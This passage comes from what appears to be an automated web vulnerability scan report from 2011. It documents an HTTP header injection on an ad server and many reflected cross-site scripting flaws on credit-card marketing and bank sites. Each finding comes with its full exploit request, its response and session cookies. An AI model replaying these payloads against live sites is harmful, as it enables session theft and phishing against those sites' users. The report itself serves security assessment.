User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:13 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591324277182&data3=0&sid=1889&c=22105561%27%27
Vary: Accept-Encoding
Content-Length: 2759
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:13 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

2. HTTP header injection previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 37d3b%0d%0a3ba1d4f669b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /37d3b%0d%0a3ba1d4f669b;spot=1297440;src=1507354;host=integrate.112.2o7.net%2Fdfa_echo?var%3Ds_1_Integrate_DFA_get_0%26AQE%3D1%26A2S%3D1;ord=4590351900266 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/37d3b
3ba1d4f669b;spot=1297440;src=1507354;host=integrate.112.2o7.net/dfa_echo:
Date: Fri, 17 Jun 2011 12:05:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected) previous next
There are 29 instances of this issue:

http://blogs.creditcards.com/ [name of an arbitrarily supplied request parameter]
http://blogs.creditcards.com/fine-print/ [name of an arbitrarily supplied request parameter]
http://click.linksynergy.com/fs-bin/click [offerid parameter]
http://oc.creditcards.com/trans_node.php [c parameter]
http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter]
http://s46.sitemeter.com/js/counter.asp [site parameter]
http://s46.sitemeter.com/js/counter.js [site parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [external_id parameter]
http://www.creditcards.com/business.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/low-interest-page-4.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/low-interest.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/points-rewards.php [name of an arbitrarily supplied request parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [BUID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [CRTV parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [EAID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PSKU parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [name of an arbitrarily supplied request parameter]
http://s46.sitemeter.com/js/counter.asp [IP cookie]
http://s46.sitemeter.com/js/counter.js [IP cookie]
http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [v1st cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://blogs.creditcards.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba3d2"-alert(1)-"9c8eb9e5473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ba3d2"-alert(1)-"9c8eb9e5473=1 HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311924490%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.creditcards.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:00 GMT
Server: Apache
Content-Type: text/html
Content-Length: 102604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<script language="JavaScript" type="text/javascript">
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="news:blogs:?ba3d2"-alert(1)-"9c8eb9e5473=1"
s.server=""
s.channel="news"
s.pageType=""
s.prop1="news"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s
...[SNIP]...

3.2. http://blogs.creditcards.com/fine-print/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/fine-print/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf6d"-alert(1)-"cf7270b0551 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fine-print/?3cf6d"-alert(1)-"cf7270b0551=1 HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:39 GMT
Server: Apache
Content-Type: text/html
Content-Length: 101946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<script language="JavaScript" type="text/javascript">
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="news:blogs:?3cf6d"-alert(1)-"cf7270b0551=1"
s.server=""
s.channel="news"
s.pageType=""
s.prop1="news"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s
...[SNIP]...

3.3. http://click.linksynergy.com/fs-bin/click [offerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 4393f<script>alert(1)</script>8b2443f3bac was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=4393f<script>alert(1)</script>8b2443f3bac&type=3&subid=0&u1=1124cf812011e906cc17069a599054 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A227478%3A1120e8cd201180061c17060a514329; lsn_track=UmFuZG9tSVZTGei6OP%2B7uQzzprzIV6pvp2RqaKp7Pb5IaO9VwdRdPkp1DAnI1Qzrj8wqGV%2FSx%2FwxjPyvCsywig%3D%3D; lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 258
Date: Fri, 17 Jun 2011 12:00:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "4393f<script>alert(1)</script>8b2443f3bac"
</body>
...[SNIP]...

3.4. http://oc.creditcards.com/trans_node.php [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload fb2c7<script>alert(1)</script>63bd7c4c2ea was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585783008788&data3=0&sid=1889&c=22105561fb2c7<script>alert(1)</script>63bd7c4c2ea HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:50 GMT
Server: Apache
Content-Length: 71
Content-Type: text/html

Invalid Clickable ID: 22105561fb2c7<script>alert(1)</script>63bd7c4c2ea

3.5. http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7152d<script>alert(1)</script>d5fbc91297f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585783008788&data3=0&sid=1889&c=2210/7152d<script>alert(1)</script>d5fbc91297f5561 HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:22 GMT
Server: Apache
Content-Length: 72
Content-Type: text/html

Invalid Clickable ID: 2210/7152d<script>alert(1)</script>d5fbc91297f5561

3.6. http://s46.sitemeter.com/js/counter.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2e63'%3balert(1)//39affea6cc8 was submitted in the site parameter. This input was echoed as f2e63';alert(1)//39affea6cc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=s46cccgblogf2e63'%3balert(1)//39affea6cc8 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:16 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46cccgblogf2e63';alert(1)//39affea6cc8', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46cccgblogf2e63';alert(1)//39affea6cc8';
// ]]>
...[SNIP]...

3.7. http://s46.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7a9f'%3balert(1)//8e5028df652 was submitted in the site parameter. This input was echoed as d7a9f';alert(1)//8e5028df652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s46cccgblogd7a9f'%3balert(1)//8e5028df652 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:09:14 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46cccgblogd7a9f';alert(1)//8e5028df652', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46cccgblogd7a9f';alert(1)//8e5028df652';
// ]]>
...[SNIP]...

3.8. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload e97b1%0aaf153dd702 was submitted in the site parameter. This input was echoed as e97b1
af153dd702 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=32528459e97b1%0aaf153dd702&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2140
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQASASRDT=JJDAEEFBPEADMJJLAIBFHCMD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459e97b1
af153dd702
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

3.9. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [external_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The value of the external_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1040a'%3balert(1)//fd5f10cff0 was submitted in the external_id parameter. This input was echoed as 1040a';alert(1)//fd5f10cff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'%3balert(1)//fd5f10cff0 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:21 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=qnm5N7BZvm2LwTLsDn0jL6RSWFbJBnk2ThWjXjd1zrvXWCT58MK2!1391065199!-711929719; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
